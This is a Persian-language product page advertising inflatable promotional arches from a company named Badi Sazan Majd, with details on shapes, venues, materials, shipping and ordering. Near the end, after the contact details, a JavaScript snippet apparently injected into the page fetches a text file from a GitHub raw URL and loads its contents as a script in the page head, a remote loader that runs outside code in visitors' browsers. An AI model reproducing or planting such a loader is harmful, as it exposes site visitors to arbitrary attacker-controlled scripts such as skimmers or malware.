آرک بادی

  • آرک های بادی برای کارهای تبلیغاتی استفاده می شود. معمولان این سازه های بادی در مراسم های بزرگ و یا روی داد های خاص و برزگ استفاده می کنند.

    آرک بادی چیست؟

    این سازه های بادی تبلیغاتی شکلی کمان دارند. این دستگاه ها در 2 شکل ضلع دار و نیم دایره می باشد. معمولان این سازه های بادی در مراسم های بزرگ و یا روی داد های خاص و برزگ استفاده می کنند

    محیط مناسب

    محیط های مناسب پیشنهادی برای آرک های بادی ترجیها محیط های سر باز مانند پل های هوایی، مکان های تفریحی رو باز، بالای در های مغازه ها و مجتمع ها و… می باشد. شما می توانید از این آرک های بادی جهت مناسبت های مختلف مانند افتتاحیه ها، مسابقات فوتبال، مناسبت های مذهبی و .. استفاده نمایید.

    جنس پارچه و دوام

    جنس پارچه این آرک ها از پارچه با کیفیت کره ای و دوخت آن توسط اساتید مجرب بادی سازان مجد انجام می شود. نخ دوخت این آرک ها از جنس نخ با کیفیت ترکیه ای می باشد. به علت استفاده اجناس مرغوب و کیفیت دوخت بالا در این سازه های تبلیغاتی، آرک ها دوام طولانی مدتی خواهند داشت.

    حمل و نقل آرک بادی

    این آرک های بادی ابعاد و اندازه ثابتی نداشته و به سفارش مشتری می باشد. همچنین چاپ این سازه های تبلیغاتی بسیار با کیفیت بوده و به سفارش مشتری انجام می شود. حمل نقل این سازه های تبلیغاتی به عهده مشتری بوده و و بر اساس اندازه و وزن پارچه جا به جایی صورت می گیرد.

    نحوه خرید

    تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خرید ارک بادی تبلیغاتی می توانید به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید